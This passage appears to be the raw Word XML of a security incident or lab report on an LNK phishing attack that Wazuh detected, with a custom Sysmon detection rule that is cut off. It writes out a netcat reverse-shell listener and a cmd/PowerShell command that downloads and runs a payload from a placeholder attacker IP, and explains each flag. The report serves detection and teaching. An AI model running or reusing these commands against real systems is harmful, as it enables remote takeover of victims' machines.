      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wazuh alert screenshot showing suspicious shell execution and file deletion activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10E6E6" w14:textId="23016E07" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20748513" wp14:editId="2BCEAE02">
            <wp:extent cx="5829300" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="805489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89477" name="Picture 805489477"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD527D" w14:textId="69847D76" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD19EC6" w14:textId="6F56F6BB" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Commands / Steps Observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DDBB2" w14:textId="7F54AF01" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker system (preparation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251D146" w14:textId="65A48590" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -lvnp 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FFA31" w14:textId="1824885A" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F48B9" w14:textId="5E5436BF" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A889D" w14:textId="49DCB7C4" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Victim execution (contained within the malicious LNK target):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8CF527" w14:textId="5BD6DE25" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\cmd.exe /c powershell.exe wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -OutFile C:\icrm\8443.exe &amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782F38D" w14:textId="5114076E" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839E043" w14:textId="5044D99E" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explanation of the Attack (step-by-step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2857E" w14:textId="072538D1" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The attacker delivers a phishing email containing a malicious shortcut attachment disguised as a legitimate notes/notepad file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242820DF" w14:textId="026AA664" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The victim clicks the shortcut (notepad.exe), triggering the embedded command chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343605ED" w14:textId="4D45E191" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The shortcut launches cmd.exe, which invokes PowerShell to download 8443.exe from the attacker-controlled server (&lt;ATTACKER_IP&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBC3CD" w14:textId="57610B03" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The downloaded file is saved to C:\icrm\8443.exe and then executed immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867D91F" w14:textId="736D67C3" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After the payload runs, the victim system establishes a reverse shell connection to the attacker listener on TCP port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8443</w:t>
      </w:r>
      <w:r>
        <w:t>, allowing interactive command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779D3CC2" w14:textId="7F70538B" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The payload is subsequently removed from the folder, which reduces visible evidence on disk and is consistent with cleanup/anti-forensic behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497E13CA" w14:textId="14674B31" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F6AA2" w14:textId="2653FBD6" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command Breakdown (line-by-line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47921E52" w14:textId="5B2B8A19" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -lvnp 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F65F3F" w14:textId="61350B29" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:t>: netcat used to receive inbound connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC95CA" w14:textId="4327E7E0" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>listen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79011CCF" w14:textId="3C14CC62" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:t>: verbose output (shows connection details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6648B3DB" w14:textId="0C7F087A" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r>
        <w:t>: numeric addressing (no DNS lookups).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241110ED" w14:textId="1234FD10" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p 8443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: listens on TCP port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8443</w:t>
      </w:r>
      <w:r>
        <w:t>, which is used as the reverse shell callback port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1865E2C1" w14:textId="4D5F5D13" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22340177" w14:textId="66ACAAA4" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\cmd.exe /c powershell.exe wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -OutFile C:\icrm\8443.exe &amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015D0B4" w14:textId="741B63B0" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd.exe /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executes the following command and exits. This is commonly used in malicious shortcuts to run a one-click execution chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D0C1F" w14:textId="2375D93F" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:t>: runs PowerShell to perform a network download and file write operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CC58B" w14:textId="770FED6C" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>: downloads the payload from the attacker-controlled web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2CE763" w14:textId="3ADAA40A" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-OutFile C:\icrm\8443.exe</w:t>
      </w:r>
      <w:r>
        <w:t>: writes the payload to C:\icrm\8443.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277683BB" w14:textId="7DE8AA32" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
      <w:r>
        <w:t>: executes the payload only if the download succeeds, ensuring reliable staging and execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1AAA2" w14:textId="01474F98" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="00ED5F9B"/>
    <w:p w14:paraId="312DC33D" w14:textId="67EABD97" w:rsidR="00C3354B" w:rsidRDefault="6845FCFF" w:rsidP="00C3354B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc220896682"/>
      <w:commentRangeStart w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:commentRangeEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="14"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A805E" w14:textId="4846B827" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183ED0CD" w14:textId="2975C02B" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This incident was detected using existing endpoint monitoring/alerting. The detection screenshot shows events consistent with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666578EF" w14:textId="27FF91EA" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abnormal command shell execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (shortcut-driven cmd.exe invocation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300B67D" w14:textId="25ADF4E5" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suspicious cmd shell activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (execution chain behaviour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B982540" w14:textId="4B7B9DF7" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell activity associated with file deletion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (consistent with the disappearance of 8443.exe after execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B55AC4" w14:textId="21383334" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Detection of Phishing through LNK files detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F7FFF" w14:textId="4008DD8C" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6284D319" wp14:editId="684D66D2">
            <wp:extent cx="5829300" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="266849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89477" name="Picture 805489477"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D9CFD66" wp14:editId="2EC182DC">
            <wp:extent cx="5829300" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139224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44416" name="Picture 1392244416"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="2162175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1137976F" wp14:editId="52E965BE">
            <wp:extent cx="5829300" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1590394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94596" name="Picture 1590394596"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="180975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6758E095" w14:textId="35E6B46B" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:r>
        <w:t>Custom Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554729C0" w14:textId="7B27300E" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;group name="sysmon,initial_access,malware_execution,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7878F6" w14:textId="565162B7" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA585E" w14:textId="4D43B03D" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;rule id="100001" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439A9B1" w14:textId="008EC064" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;if_sid&gt;61603&lt;/if_sid&gt; &lt;field name="win.eventdata.parentImage"&gt;\\cmd.exe&lt;/field&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E232EE6" w14:textId="2377D97D" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
